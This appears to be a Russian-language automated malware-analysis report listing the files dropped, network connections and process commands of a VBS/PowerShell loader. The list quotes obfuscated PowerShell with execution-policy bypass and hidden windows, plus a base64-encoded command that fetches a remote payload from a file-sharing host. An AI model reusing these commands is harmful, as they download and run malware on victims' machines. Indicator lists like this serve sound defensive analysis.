Техническая информация
- %TEMP%\qt26g-ip.0.cs
- %TEMP%\qt26g-ip.cmdline
- %TEMP%\qt26g-ip.out
- %TEMP%\cscbab6.tmp
- %TEMP%\resbac7.tmp
- %TEMP%\qt26g-ip.dll
- %APPDATA%\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbs
- %TEMP%\resbac7.tmp
- %TEMP%\cscbab6.tmp
- %TEMP%\qt26g-ip.dll
- %TEMP%\qt26g-ip.cmdline
- %TEMP%\qt26g-ip.out
- %TEMP%\qt26g-ip.0.cs
- %TEMP%\qt26g-ip.pdb
- '23.##.171.138':80
- '10##.#ilemail.com':443
- http://23.##.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF
- '10##.#ilemail.com':443
- DNS ASK 10##.#ilemail.com
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "PoWeRShell -Ex BYpAss -nop -W 1 ... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qt26g-ip.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESBAC7.tmp" "%TEMP%\CSCBAB6.tmp" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfV... (со скрытым окном)